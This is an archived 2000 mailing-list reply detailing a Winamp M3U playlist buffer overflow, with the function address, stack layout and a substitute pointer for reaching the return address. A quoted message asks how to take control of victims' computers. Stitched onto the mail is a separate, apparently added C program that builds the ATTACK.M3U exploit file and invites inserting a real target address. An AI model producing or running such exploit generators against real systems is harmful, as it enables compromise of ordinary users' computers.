Vulnerability Development mailing list archives
Re: Winamp M3U playlist parser buffer overflow security vulnerability
From: Pauli Ojanpera <pauli_ojanpera () HOTMAIL COM>
Date: Wed, 26 Jul 2000 18:04:58 EEST
LEGAL NOTICE: The same stuff applies to this as to the original post.

Once again I was not specific enough in my post to Bugtraq. I guess I never learn.

The faulty function in question starts at memory address 0x411FE5. The function has a local variable stored on the stack right after the buffer to be overflowed and right before the stored frame pointer (EBP). This way:

  [Return address]                              = 4 bytes
  [Stored frame pointer (EBP)]                  = 4 bytes
  [FILE *fp]                                    = 4 bytes
  [Buffer to overflow (#EXTINF: parameter)]     = 269 bytes

In order to get the function to successfully return, the file pointer in between the buffer and the stored frame pointer MUST point to a valid FILE record. (I indeed am not sure if it is a FILE pointer, but it is a pointer to some record anyway.)

Because the FILE pointer contains a zero in it, it cannot be overwritten to hold the same old value it had. I however found a valid address in the IN_MOD plugin address space that I could use to fool the function into believing the pointer points to a valid record. That address doesn't have values that couldn't be embedded in the string.

The file (ATTACK.M3U) I attached to my original post has this value (0x1111A1A0) in the right position (bytes 270-273) in the parameter string. After that, it has a dummy frame pointer value ('PPPP') and next is the return address to jump to ('AAAA').

With a runtime debugger (not to mention one :) you can breakpoint at 0x411FE5 and inspect the stack frame to see how things are stored there.

P.S. I'm f*en sorry for my probably erroneous English. 8-]

----Original Message Follows----
From: xxx <xxx@xxx>
To: "Pauli Ojanpera" <pauli_ojanpera () HOTMAIL COM>
Subject: Re: Winamp M3U playlist parser buffer overflow security vulnerability
Date: Mon, 24 Jul 2000 14:30:50 -0400

Hey man, I got that sploit you found in Winamp, using the 280 A's. Well, you also stated that you can take control over their computer. Well, I have been trying and I can't seem to find how you can control them. Do you think you can guide me to any way that works? Thanks a lot man. xxx.
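The stack layout described in the post (269-byte #EXTINF: parameter buffer, then the 4-byte record pointer, then the saved EBP, then the return address) is enough to build the ATTACK.M3U parameter string mechanically. The following C program is an added example, not the poster's attachment: it lays out the bytes exactly as the post describes them (filler, 0x1111A1A0 in little-endian order at offsets 270-273, 'PPPP', 'AAAA') and checks that the fake record pointer contains no NUL, CR or LF byte, which is what the post means by "values that couldn't be embedded in the string". It assumes that everything after "#EXTINF:" on the line is what lands in the buffer and that a following playlist entry line is harmless; both are assumptions, not facts stated on the page.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define BUF_LEN        269u        /* #EXTINF: parameter buffer size, from the post */
#define FAKE_FILE_PTR  0x1111A1A0u /* IN_MOD address the post says passes the record check */
#define PAYLOAD_LEN    (BUF_LEN + 4 + 4 + 4) /* buffer + fp + saved EBP + return address */

/* Store a 32-bit value little-endian, the byte order x86 reads it from the stack. */
static void put_le32(unsigned char *p, uint32_t v)
{
    p[0] = (unsigned char)(v & 0xFF);
    p[1] = (unsigned char)((v >> 8) & 0xFF);
    p[2] = (unsigned char)((v >> 16) & 0xFF);
    p[3] = (unsigned char)((v >> 24) & 0xFF);
}

/* Returns 1 if any byte of v would terminate or break a text line in the playlist
   (NUL ends the C string copy, CR/LF end the M3U line), otherwise 0. */
int has_bad_byte(uint32_t v)
{
    for (int i = 0; i < 4; i++) {
        unsigned char b = (unsigned char)((v >> (8 * i)) & 0xFF);
        if (b == 0x00 || b == 0x0A || b == 0x0D)
            return 1;
    }
    return 0;
}

/* Build the #EXTINF: parameter bytes in the order the post gives:
   269 filler bytes, fake record pointer, dummy saved EBP, return address.
   Returns the number of bytes written, or 0 if the output buffer is too small. */
size_t build_extinf_param(unsigned char *out, size_t cap, uint32_t ret_addr)
{
    if (cap < PAYLOAD_LEN)
        return 0;
    memset(out, 'A', BUF_LEN);                     /* bytes 1..269: fill the local buffer */
    put_le32(out + BUF_LEN, FAKE_FILE_PTR);        /* bytes 270..273: record pointer */
    memcpy(out + BUF_LEN + 4, "PPPP", 4);          /* bytes 274..277: saved EBP (dummy) */
    put_le32(out + BUF_LEN + 8, ret_addr);         /* bytes 278..281: return address */
    return PAYLOAD_LEN;
}

/* Write the playlist: "#EXTINF:" + parameter + newline, then a dummy entry line.
   The entry line is an assumption about what a parser expects after #EXTINF:.
   Returns 0 on success, -1 on failure. */
int write_m3u(const char *path, uint32_t ret_addr)
{
    unsigned char param[PAYLOAD_LEN];
    size_t n = build_extinf_param(param, sizeof param, ret_addr);
    if (n == 0 || has_bad_byte(FAKE_FILE_PTR) || has_bad_byte(ret_addr))
        return -1;
    FILE *f = fopen(path, "wb");
    if (!f)
        return -1;
    int ok = fputs("#EXTM3U\n#EXTINF:", f) >= 0
          && fwrite(param, 1, n, f) == n
          && fputs("\ndummy.mp3\n", f) >= 0;
    return fclose(f) == 0 && ok ? 0 : -1;
}

int main(void)
{
    /* 'AAAA' as the return address reproduces the post's attachment; swap in a
       real target address once the stack frame has been inspected at 0x411FE5. */
    if (write_m3u("ATTACK.M3U", 0x41414141u) != 0) {
        fputs("failed to write ATTACK.M3U\n", stderr);
        return 1;
    }
    printf("wrote ATTACK.M3U with a %u-byte #EXTINF: parameter\n", (unsigned)PAYLOAD_LEN);
    return 0;
}
```

Bytes 270-273 of the parameter are A0 A1 11 11, so the post's note that the address "doesn't have values that couldn't be embedded in the string" checks out; an address with a zero byte, such as a typical 0x004xxxxx image address, fails has_bad_byte and cannot be placed there, which is why the poster had to find a substitute pointer in IN_MOD.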